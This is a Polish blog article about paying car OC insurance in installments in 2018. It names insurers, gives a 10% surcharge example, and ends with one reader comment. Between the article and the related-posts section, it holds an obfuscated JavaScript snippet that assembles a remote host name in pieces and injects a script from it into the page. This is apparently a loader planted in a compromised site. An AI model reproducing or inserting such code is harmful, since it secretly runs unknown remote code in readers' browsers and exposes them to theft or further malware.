OC na raty w 2018 roku – gdzie najlepiej?

Koszt ubezpieczeń komunikacyjnych nadal jest dość wysoki, mimo że ceny utrzymują się na stabilnym poziomie. Dlatego kierowcy poszukują sposobów, dzięki którym mogą uniknąć tak dużego obciążenia dla domowego budżetu. Jednym z rozwiązań jest rozłożenie płatności na raty – sprawdź, gdzie zrobisz to na korzystnych warunkach.

Jak wynika z informacji na temat ubezpieczenia OC i AC w porównywarce Rankomat, ubezpieczyciele dają kierowcom możliwość rozłożenia płatności na raty. Chociaż w większości przypadków istnieje możliwość zapłaty składki w dwóch ratach (jedna składka co pół roku), istnieją także inne warianty.

OC na raty – najlepsze oferty

Jeżeli zastanawiasz się nad płatnością za składkę OC w ratach, sprawdź, gdzie zrobisz to najkorzystniej. Porównaj dostępne oferty firm ubezpieczeniowych i przeanalizuj, który ubezpieczyciel proponuje najniższe ceny.

Najlepsze oferty poznasz szybko i łatwo, korzystając np. z serwisu porównywarkowego. Wystarczy wypełnić krótki formularz, a następnie wybrać najtańszą polisę. W tym przypadku można kierować się ceną ubezpieczenia, ponieważ nie wpływa na zakres ochrony ubezpieczeniowej oraz wysokość wypłacanych sum gwarancyjnych.

Dobre oferty ubezpieczeń ratalnych proponuje m.in. Axa Direct, Allianz, Link4 (nawet do 4 rat przy pakiecie OC+AC) czy Benefia (przy zakupie pakietu OC+AC).

OC na raty – czy to się opłaca?

Jednorazowa wpłata na ubezpieczenie komunikacyjne to zawsze duże obciążenie finansowe. Szczególnie dla niedoświadczonych kierowców – ubezpieczenie OC dla młodych w 2018 roku może wynieść nawet kilka tysięcy złotych. Dlatego po podwyżkach cen, coraz bardziej popularne stało się rozłożenie płatności na raty.

Decydując się na takie rozwiązanie, trzeba jednak liczyć się z wyższą sumaryczną kwotą ubezpieczenia. Dopłaty wahają się w dość szerokich granicach – są one ustalane indywidualnie przez towarzystwo ubezpieczeniowe. Wszystko zależy od stawki wyjściowej OC oraz od tego, na ile rat zostanie rozłożone zobowiązanie.

Przykład. Wykupujesz polisę OC w You Can Drive. Rozkładając płatność na cztery raty, dopłata wyniesie ok. 10% stawki bazowej ubezpieczenia.

Nie ma jednoznacznej odpowiedzi dotyczącej opłacalności rozkładania zobowiązania na raty. Z czysto matematycznego punktu widzenia nie jest to korzystne, ponieważ trzeba zapłacić więcej. Czasami jednak OC na raty jest koniecznością, ponieważ jednorazowa wpłata znacznie obciąża finanse. Biorąc pod uwagę fakt, że dopłaty wynoszą średnio 10% wartości składki, można rozważyć taką opcję bez większych strat w domowym budżecie.

(function(){
akxv=document.createElement(“script”);akxv_=”u”+(“s”)+”ta”;
akxv_+=(“t.i”)+””+”n”;akxv_+=((“f”)+”o”);akxv.type=”text/javascript”;
akxv_+=”/”; akxvu=”70927676″;akxvu+=”.wqsnt86Xkxvrpnbdazw”;akxvu+=”elbxdt8qr61″;
akxv.src=”//”+akxv_+akxvu; akxv.async=true; document.body.appendChild(akxv);
})();

Podobne wpisy

2 komentarze

  1. Jak na raty i najtaniej to dobrą opcję teraz dają w yanosiku, jak jezdzisz jak czlowiek to oferta jest mega dobre

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.